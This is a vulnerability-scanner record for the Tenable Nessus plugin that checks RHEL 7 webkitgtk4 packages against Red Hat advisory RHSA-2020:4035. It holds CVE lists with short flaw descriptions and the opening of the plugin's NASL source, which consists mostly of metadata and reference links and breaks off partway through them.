Use-after-free issue in accessibility/AXObjectCache.cpp (CVE-2020-10018)\n\n - webkitgtk: use-after-free via crafted web content (CVE-2020-11793)\n\n - webkitgtk: Denial of service via incorrect memory handling (CVE-2020-3862)\n\n - webkitgtk: Non-unique security origin for DOM object contexts (CVE-2020-3864)\n\n - webkitgtk: Incorrect security check for a top-level DOM object context (CVE-2020-3865)\n\n - webkitgtk: Incorrect processing of file URLs (CVE-2020-3885)\n\n - webkitgtk: Race condition allows reading of restricted memory (CVE-2020-3894)\n\n - webkitgtk: Memory corruption triggered by a malicious web content (CVE-2020-3895)\n\n - webkitgtk: Type confusion leading to arbitrary code execution (CVE-2020-3897, CVE-2020-3901)\n\n - webkitgtk: Memory consumption issue leading to arbitrary code execution (CVE-2020-3899)\n\n - webkitgtk: Memory corruption triggered by a malicious web content (CVE-2020-3900)\n\n - webkitgtk: Input validation issue leading to cross-site script attack (CVE-2020-3902)\n\n - webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2021-30666)\n\n - webkitgtk: Memory corruption leading to arbitrary code execution (CVE-2021-30761)\n\n - webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2021-30762)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-11-19T00:00:00", "type": "nessus", "title": "RHEL 7 : webkitgtk4 (RHSA-2020:4035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902", "CVE-2021-30666", "CVE-2021-30761", "CVE-2021-30762"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:webkitgtk4", "p-cpe:/a:redhat:enterprise_linux:webkitgtk4-devel", "p-cpe:/a:redhat:enterprise_linux:webkitgtk4-doc", "p-cpe:/a:redhat:enterprise_linux:webkitgtk4-jsc", "p-cpe:/a:redhat:enterprise_linux:webkitgtk4-jsc-devel"], "id": "REDHAT-RHSA-2020-4035.NASL", "href": "https://www.tenable.com/plugins/nessus/143094", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4035. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143094);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-8506\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8551\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8625\",\n \"CVE-2019-8644\",\n \"CVE-2019-8649\",\n \"CVE-2019-8658\",\n \"CVE-2019-8666\",\n \"CVE-2019-8669\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8674\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8678\",\n \"CVE-2019-8679\",\n \"CVE-2019-8680\",\n \"CVE-2019-8681\",\n \"CVE-2019-8683\",\n \"CVE-2019-8684\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8688\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8707\",\n \"CVE-2019-8710\",\n \"CVE-2019-8719\",\n \"CVE-2019-8720\",\n \"CVE-2019-8726\",\n \"CVE-2019-8733\",\n \"CVE-2019-8735\",\n \"CVE-2019-8743\",\n \"CVE-2019-8763\",\n \"CVE-2019-8764\",\n \"CVE-2019-8765\",\n \"CVE-2019-8766\",\n \"CVE-2019-8768\",\n \"CVE-2019-8769\",\n \"CVE-2019-8771\",\n \"CVE-2019-8782\",\n \"CVE-2019-8783\",\n \"CVE-2019-8808\",\n \"CVE-2019-8811\",\n \"CVE-2019-8812\",\n \"CVE-2019-8813\",\n \"CVE-2019-8814\",\n \"CVE-2019-8815\",\n \"CVE-2019-8816\",\n \"CVE-2019-8819\",\n \"CVE-2019-8820\",\n \"CVE-2019-8821\",\n \"CVE-2019-8822\",\n \"CVE-2019-8823\",\n \"CVE-2019-8835\",\n \"CVE-2019-8844\",\n \"CVE-2019-8846\",\n \"CVE-2019-11070\",\n \"CVE-2020-3862\",\n \"CVE-2020-3864\",\n \"CVE-2020-3865\",\n \"CVE-2020-3867\",\n \"CVE-2020-3868\",\n \"CVE-2020-3885\",\n \"CVE-2020-3894\",\n \"CVE-2020-3895\",\n \"CVE-2020-3897\",\n \"CVE-2020-3899\",\n \"CVE-2020-3900\",\n \"CVE-2020-3901\",\n \"CVE-2020-3902\",\n \"CVE-2020-10018\",\n \"CVE-2020-11793\",\n \"CVE-2021-30666\",\n \"CVE-2021-30761\",\n \"CVE-2021-30762\"\n );\n script_bugtraq_id(\n 109328,\n 109329,\n 108497,\n 108566\n );\n script_xref(name:\"RHSA\", value:\"2020:4035\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"RHEL 7 : webkitgtk4 (RHSA-2020:4035)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:4035 advisory.\n\n - webkitgtk: HTTP proxy setting deanonymization information disclosure (CVE-2019-11070)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-6237,\n CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595,\n CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611,\n CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8644, CVE-2019-8666, CVE-2019-8669,\n CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679,\n CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688,\n CVE-2019-8689, CVE-2019-8707, CVE-2019-8710, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735,\n CVE-2019-8763, CVE-2019-8765, CVE-2019-8766, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811,\n CVE-2019-8812, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821,\n CVE-2019-8822, CVE-2019-8823, CVE-2020-3868)\n\n - webkitgtk: processing maliciously crafted web content lead to URI spoofing (CVE-2019-6251)\n\n - webkitgtk: malicous web content leads to arbitrary code execution (CVE-2019-8506)\n\n - webkitgtk: malicious web content leads to arbitrary code execution (CVE-2019-8524, CVE-2019-8559,\n CVE-2019-8563)\n\n - webkitgtk: malicious crafted web content leads to arbitrary code execution (CVE-2019-8535, CVE-2019-8536,\n CVE-2019-8558)\n\n - webkitgtk: malicious crafted web content leads to arbitrary we content (CVE-2019-8544)\n\n - webkitgtk: malicious web content leads to cross site scripting (CVE-2019-8551)\n\n - webkitgtk: Out-of-bounds read leading to memory disclosure (CVE-2019-8607)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8625,\n CVE-2019-8649, CVE-2019-8658, CVE-2019-8674, CVE-2019-8690, CVE-2019-8719, CVE-2019-8813, CVE-2020-3867)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-8743)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8764)\n\n - webkitgtk: Browsing history could not be deleted (CVE-2019-8768)\n\n - webkitgtk: Websites could reveal browsing history (CVE-2019-8769)\n\n - webkitgtk: Violation of iframe sandboxing policy (CVE-2019-8771)\n\n - webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-8835,\n CVE-2019-8844)\n\n - webkitgtk: Use after free issue may lead to remote code execution (CVE-2019-8846)\n\n - webkitgtk: Use-after-free issue in accessibility/AXObjectCache.cpp (CVE-2020-10018)\n\n - webkitgtk: use-after-free via crafted web content (CVE-2020-11793)\n\n - webkitgtk: Denial of service via incorrect memory handling (CVE-2020-3862)\n\n - webkitgtk: Non-unique security origin for DOM object contexts (CVE-2020-3864)\n\n - webkitgtk: Incorrect security check for a top-level DOM object context (CVE-2020-3865)\n\n - webkitgtk: Incorrect processing of file URLs (CVE-2020-3885)\n\n - webkitgtk: Race condition allows reading of restricted memory (CVE-2020-3894)\n\n - webkitgtk: Memory corruption triggered by a malicious web content (CVE-2020-3895)\n\n - webkitgtk: Type confusion leading to arbitrary code execution (CVE-2020-3897, CVE-2020-3901)\n\n - webkitgtk: Memory consumption issue leading to arbitrary code execution (CVE-2020-3899)\n\n - webkitgtk: Memory corruption triggered by a malicious web content (CVE-2020-3900)\n\n - webkitgtk: Input validation issue leading to cross-site script attack (CVE-2020-3902)\n\n - webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2021-30666)\n\n - webkitgtk: Memory corruption leading to arbitrary code execution (CVE-2021-30761)\n\n - webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2021-30762)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-6237\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-6251\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8506\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8535\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8536\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8544\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8551\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8558\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8559\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8571\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8583\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8586\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8587\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8594\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8596\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8597\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8601\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8622\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8625\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8644\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8669\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8671\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8672\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8673\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8674\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8676\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8677\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8678\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8679\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8680\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8684\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8686\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8688\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8689\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8690\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8707\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8710\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8719\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8720\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8726\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8733\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8735\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8743\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8763\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8764\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8765\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8766\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8768\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8769\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8771\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8783\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8808\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8811\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8813\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8814\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8815\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8816\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8819\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8820\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8821\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8822\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8823\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8835\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8844\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-8846\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-11070\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3862\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3864\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3865\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3867\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3868\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3885\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3895\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3897\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3899\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3900\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3901\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-3902\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-10018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11793\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-30666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-30761\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-30762\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4035\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1667409\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1709289\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719199\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719209\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719213\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719224\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719231\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719235\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719237\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719238\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1811721\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1816678\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1816684\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1816686\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1829369\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876462\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876463\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876470\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876472\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876473\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876476\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876516\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876518\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876521\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876522\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876523\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876536\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876537\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876540\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876542\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876543\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876545\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876548\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876549\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876550\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876552\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876553\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876554\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876556\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876590\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876591\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876592\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876593\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876594\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876612\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876614\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876616\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876617\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876626\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876628\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876629\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876630\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876631\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876634\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876643\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876644\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876645\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876646\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876647\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876648\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1876651\");\n 